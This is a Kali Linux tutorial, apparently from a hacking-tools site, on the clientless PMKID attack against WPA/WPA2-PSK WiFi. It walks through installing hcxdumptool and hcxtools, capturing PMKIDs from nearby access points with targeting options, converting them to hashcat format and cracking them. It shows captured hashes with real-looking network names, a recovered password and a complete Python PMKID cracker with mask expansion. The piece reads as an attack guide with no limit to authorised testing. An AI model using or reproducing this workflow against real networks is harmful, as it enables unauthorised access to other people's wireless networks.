Kalitut Com Pmkid Attack
There are a large number of different attacks on WiFi. The most universal attack (working against virtually all access points) is an attack on WPA/WPA2, since that technology is used in the vast majority of wireless access points.
When a client connects to a WPA/WPA2 access point, the two sides run the 4-way handshake, carried in EAPOL frames, during which data is exchanged step by step between the access point and the client that wants to connect. The essence of the attack is to intercept the transmitted data (all of it, or at least the part that matters) and then search for the password that matches it. Simply put, you first need to grab a handshake (at the EAPOL stage), and then brute-force the correct password.
Difficulties may arise at each of these two stages. Problems with capturing a handshake can have many causes, the most fatal of them being the lack of clients: if no client is connecting, the EAPOL handshake never takes place, which means there is nothing to intercept.
The main difference from the existing attacks is that this attack does not require a full 4-way EAPOL handshake. The new attack works on the RSN IE (Robust Security Network Information Element), and a single EAPOL frame is enough for it to succeed, because the PMKID the attack needs is already contained in that first frame.
At present it is not known for how many routers this method will work; most likely for all existing 802.11i/p/q/r networks with roaming features enabled, which is the majority of modern routers.
Next, some theoretical information from the hashcat forum thread where the attack was announced, and then an example of a real successful attack using this technique.
This attack was discovered by chance while searching for new ways to attack the future security standard WPA3. WPA3 will be much harder to attack because of its modern key establishment protocol, "Simultaneous Authentication of Equals" (SAE).
It is not reported whether a new attack on WPA3 was found, but a new attack on WPA/WPA2-PSK was, and the necessary tools have already been prepared. The main difference from the existing attacks is that the new method does not require capturing the full 4-way EAPOL handshake: it works on the RSN IE (Robust Security Network Information Element) of a single EAPOL frame.
So far not enough information has been gathered to say exactly for which manufacturers or which routers this technique will work, but the authors believe that it will work against any 802.11i/p/q/r network with roaming features enabled (most modern routers).
Note that 802.11q appears in that list. This standard is not in use (the designation is reserved); the authors added it to the list as a joke, to spot those who reprint material without checking anything at all.
Note also that all the data we need arrives in the FIRST EAPOL frame, which the access point sends.
Tools to attack WiFi without clients in Kali Linux
Three tools are needed for this attack: hcxdumptool (capture), hcxtools (conversion; it provides hcxpcaptool) and hashcat (cracking).
# install hcxdumptool
git clone https://github.com/ZerBea/hcxdumptool
cd hcxdumptool/
make
sudo make install
cd .. # back up
# install hcxtools (needs the libcurl, OpenSSL and zlib headers)
sudo apt install libcurl4-openssl-dev libssl-dev zlib1g-dev
git clone https://github.com/ZerBea/hcxtools
cd hcxtools/
make
sudo make install
cd ..
hashcat is installed by default in Kali Linux.
Example of a “no client” attack on WiFi
Let’s start with the following command:
sudo hcxdumptool -I
In theory, you do not need to switch the WiFi card to monitor mode yourself: hcxdumptool should do it for us. But if you get these messages:
interface is not up
failed to init socket
then switch the wireless interface to monitor mode manually (with ip link and iw, for example). I use the wlan0 interface, so my commands refer to wlan0.
As already mentioned, all access points are attacked by default. If you want to attack only some of them or only one, use the option --filterlist=<file>, where <file> is a list of MAC addresses (one per line). By default the targets in this list will NOT be attacked (the list acts as a blacklist). If you want to attack ONLY the targets from the list, add the option --filtermode=2.
If you want to attack a specific access point and you know the channel number it works on, then in addition to --filterlist (with a single address in the file) and --filtermode=2, you can specify the -c option followed by the channel number of the AP, so that hcxdumptool stays on that channel instead of hopping.
Additionally, from time to time a summary line appears below, including one containing the string powned, for example powned=6:
This means that data has been captured for six (in my case) access points. This is not necessarily a PMKID: regular handshakes are also counted (unless the deauthentication attack was disabled).
Depending on how noisy the WiFi channel is, it may take some time to get a PMKID. The authors recommend running hcxdumptool for up to 10 minutes. Capture can run for any length of time, but usually 10 minutes is more than enough.
To stop capturing, press Ctrl+C.
Now run hcxpcaptool to convert the captured data from pcapng format into the hash format that hashcat accepts:
hcxpcaptool -z test.16800 test.pcapng
Here:
-z test.16800 is the output file of PMKID hashes in the format of hashcat mode 16800 (one hash per line);
test.pcapng is the capture written by hcxdumptool.
Open the result in any editor:
gedit test.16800
Content of my file:
f2d89d22949759168edf5fd0324764a7*cc4eece1ad58*008092b75244
b3304420b5100873aa23ee3fc2ab3244*d8fb5e49f484*9c04ebaaa33d
a695c4e6a51c1590ea06a458a1860a24*403dec1a88a8*a8880854af50
8a8e906b2fb33e0c66833e5efeb4dc8e*403dec187630*7429afe41473
bba899c7bd8719487377dd38a83a2648*403decc272b8*bc926b7c4e2c
5a2da74a1dbe085331dcd9af61a87f50*c88d833bea34*18e29fec7be3
e33c525441bf7588c53966addb685a4c*98ded0be2346*fcc2333f478f
67661236088d31c937a4646ede4aa7bb*403decbeb114*fcc2333f478f
1bdb53c369ca8c470d9cc990440f056f*2c088c5a4862*60a4d0044de7
Does it look unclear? In fact, it is quite simple. Each line has four fields separated by asterisks:
PMKID
MAC AP
MAC Station
ESSID (hex-encoded)
The most interesting part of the hash for us is the field after the last asterisk: the name of the access point in hexadecimal. To translate that name into readable form, pipe the hex string through xxd -r -p.
Result:
PURE FURNITURE
To show the names of all access points for which data was captured, use the command:
awk -F "*" '{ system("echo " $4 " | xxd -r -p; echo" ) }' test.16800
This is not required, but with hcxpcaptool you can also try the options -E, -I and -U, which write out any ESSIDs, EAP identities and usernames found in the capture:
-E <file> ESSID list
-I <file> identity list
-U <file> username list
These files can be used as dictionaries for hashcat, and they usually give a good result. Add the options to the same hcxpcaptool command as above.
These options search the capture for any strings transmitted in clear text. As I said at the beginning, vendors' WiFi implementations differ, and in some of them sensitive data may be transmitted in the clear.
New files may appear: essidlist (mostly consisting of access point names, but there may be other very interesting lines), identitylist and usernamelist. Some of the files will not appear if nothing is found.
Now on to the brute-force.
You can search for passwords by mask or by dictionary, and you can attack either all the hashes in the file or individual ones. hashcat's mode for this hash type is 16800 (-m 16800).
For example, to attack all hashes with a dictionary attack, I run hashcat with -m 16800 in dictionary mode (-a 0), giving it the path to test.16800 and the path to the wordlist.
If you want to crack only individual hashes, then in the same command, instead of the path to the file with the hashes, specify the hash itself, in quotes. For example, to crack only the hash
b3304420b5100873aa23ee3fc2ab3244*d8fb5e49f484*9c04ebaaa33d*5055524520465552
I pass that string in place of the file name.
Cracked hashes are shown (and saved to hashcat's potfile) in the form hash:password, for example:
fa9a5dd2fb9029bfc9f4d1bd4e384bfb*403decc272b8*7081eb739a56
That is, the original hash, followed by a colon and the password in clear text. In this case the password is 00001777; to decode the name of the access point we use the already familiar xxd -r -p construction.
Attack results:
The first dictionary attack failed, but the second attack, by mask, cracked 2 of 9 passwords.
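What hashcat does for every candidate in the dictionary and mask attacks above, and what the four fields of a test.16800 line mean, can be reproduced in a few lines. The following is an added example written for this article, not code from the page, from hashcat or from the hcxtools project. It parses lines in the 16800 format shown earlier (PMKID*MAC_AP*MAC_STA*ESSID_hex), derives the PMK from a candidate passphrase with PBKDF2-HMAC-SHA1 (4096 iterations, ESSID as salt) as 802.11i specifies, computes PMKID = HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_STA) and compares it with the captured value. The sample line is constructed inside the block from the ESSID and MAC addresses that appear above and the passphrase 00001777, so its PMKID is computed here and was not captured from any network; the hashcat-style mask expander is a minimal one that handles only ?d, ?l and ?u, and the function and variable names are the example's own.

```python
"""Verify and crack WPA/WPA2 PMKID hashes in hashcat's 16800 line format.

Added example for this article; not code from the page, hashcat or hcxtools.
Line format: PMKID*MAC_AP*MAC_STA*ESSID_hex (every field hex, no separators).
"""
import hashlib
import hmac
import itertools
from dataclasses import dataclass
from typing import Dict, Iterable, List


@dataclass(frozen=True)
class Pmkid16800:
    pmkid: bytes    # 16 bytes: first 128 bits of the HMAC-SHA1
    mac_ap: bytes   # 6 bytes: authenticator (AP) MAC
    mac_sta: bytes  # 6 bytes: supplicant (station) MAC
    essid: bytes    # raw SSID bytes (hex-decoded 4th field)

    @classmethod
    def parse(cls, line: str) -> "Pmkid16800":
        fields = line.strip().split("*")
        if len(fields) != 4:
            raise ValueError("expected 4 '*'-separated fields, got %d" % len(fields))
        pmkid, mac_ap, mac_sta, essid = (bytes.fromhex(f) for f in fields)
        if len(pmkid) != 16 or len(mac_ap) != 6 or len(mac_sta) != 6:
            raise ValueError("bad field length in: " + line)
        if not 0 < len(essid) <= 32:
            raise ValueError("ESSID must be 1..32 bytes")
        return cls(pmkid, mac_ap, mac_sta, essid)

    def to_line(self) -> str:
        return "*".join(b.hex() for b in (self.pmkid, self.mac_ap, self.mac_sta, self.essid))

    def essid_text(self) -> str:
        # Same job as the article's 'xxd -r -p' one-liner, with non-UTF-8 bytes escaped
        return self.essid.decode("utf-8", errors="backslashreplace")


def pmk_from_passphrase(passphrase: str, essid: bytes) -> bytes:
    """802.11i PSK derivation: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), essid, 4096, 32)


def pmkid_from_pmk(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA); the AP puts it in EAPOL message 1."""
    return hmac.new(pmk, b"PMK Name" + mac_ap + mac_sta, hashlib.sha1).digest()[:16]


def valid_psk_passphrase(candidate: str) -> bool:
    # WPA-PSK passphrases are 8..63 printable ASCII characters; anything else is never tried
    return 8 <= len(candidate) <= 63 and all(32 <= ord(c) <= 126 for c in candidate)


def check_candidate(entry: Pmkid16800, candidate: str) -> bool:
    """True if 'candidate' is the PSK behind this captured PMKID."""
    if not valid_psk_passphrase(candidate):
        return False
    pmk = pmk_from_passphrase(candidate, entry.essid)
    return hmac.compare_digest(pmkid_from_pmk(pmk, entry.mac_ap, entry.mac_sta), entry.pmkid)


# Minimal hashcat-style mask expander: ?d digits, ?l lowercase, ?u uppercase, ?? a literal '?'
_CHARSETS = {"d": "0123456789",
             "l": "abcdefghijklmnopqrstuvwxyz",
             "u": "ABCDEFGHIJKLMNOPQRSTUVWXYZ"}


def expand_mask(mask: str) -> Iterable[str]:
    slots: List[str] = []
    i = 0
    while i < len(mask):
        if mask[i] == "?":
            if i + 1 >= len(mask):
                raise ValueError("dangling '?' in mask")
            key = mask[i + 1]
            if key != "?" and key not in _CHARSETS:
                raise ValueError("unsupported charset ?" + key)
            slots.append("?" if key == "?" else _CHARSETS[key])
            i += 2
        else:
            slots.append(mask[i])
            i += 1
    for combo in itertools.product(*slots):
        yield "".join(combo)


def crack(entries: Iterable[Pmkid16800], candidates: Iterable[str]) -> Dict[str, str]:
    """Return {hash_line: passphrase} for every entry a candidate matches (potfile style).

    PBKDF2 is the expensive step and depends only on (passphrase, ESSID), so entries are
    grouped by ESSID and the PMK is derived once per ESSID per candidate, as hashcat does.
    """
    by_essid: Dict[bytes, List[Pmkid16800]] = {}
    for e in entries:
        by_essid.setdefault(e.essid, []).append(e)
    found: Dict[str, str] = {}
    for candidate in candidates:
        if not valid_psk_passphrase(candidate):
            continue
        for essid, pending in list(by_essid.items()):
            pmk = pmk_from_passphrase(candidate, essid)
            for e in pending[:]:
                if hmac.compare_digest(pmkid_from_pmk(pmk, e.mac_ap, e.mac_sta), e.pmkid):
                    found[e.to_line()] = candidate
                    pending.remove(e)
            if not pending:
                del by_essid[essid]
        if not by_essid:
            break
    return found


def make_entry(essid: str, mac_ap: str, mac_sta: str, passphrase: str) -> Pmkid16800:
    """Build a test vector: the PMKID an AP with this PSK would send in EAPOL message 1."""
    ap, sta, ssid = bytes.fromhex(mac_ap), bytes.fromhex(mac_sta), essid.encode("utf-8")
    return Pmkid16800(pmkid_from_pmk(pmk_from_passphrase(passphrase, ssid), ap, sta), ap, sta, ssid)


# Constructed sample: ESSID and MACs from the article, passphrase 00001777; PMKID computed here
SAMPLE_ENTRY = make_entry("PURE FURNITURE", "d8fb5e49f484", "9c04ebaaa33d", "00001777")
SAMPLE_LINE = SAMPLE_ENTRY.to_line()

if __name__ == "__main__":
    entry = Pmkid16800.parse(SAMPLE_LINE)
    print("ESSID:", entry.essid_text())
    # Like the article's mask attack, but a 100-candidate mask so it finishes in a few seconds
    for line, password in crack([entry], expand_mask("000017?d?d")).items():
        print("%s:%s" % (line, password))
```

Two things worth keeping in mind when using this against real captures: the 8-character minimum means a shorter mask such as ?d?d?d?d can never match a WPA-PSK network, so it only wastes time, and because the PMK is derived once per ESSID, a capture with nine hashes from nine differently named networks costs nine times as much per candidate as nine hashes from one network. In current hashcat and hcxtools releases the 16800 mode and hcxpcaptool have been superseded by the 22000 format and hcxpcapngtool, but the PMKID computation shown here is unchanged.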
Conclusion
The attack considered here is a great addition to the existing ones. With it there is a real chance of getting the password of completely "hopeless" access points: ones without clients and with WPS turned off.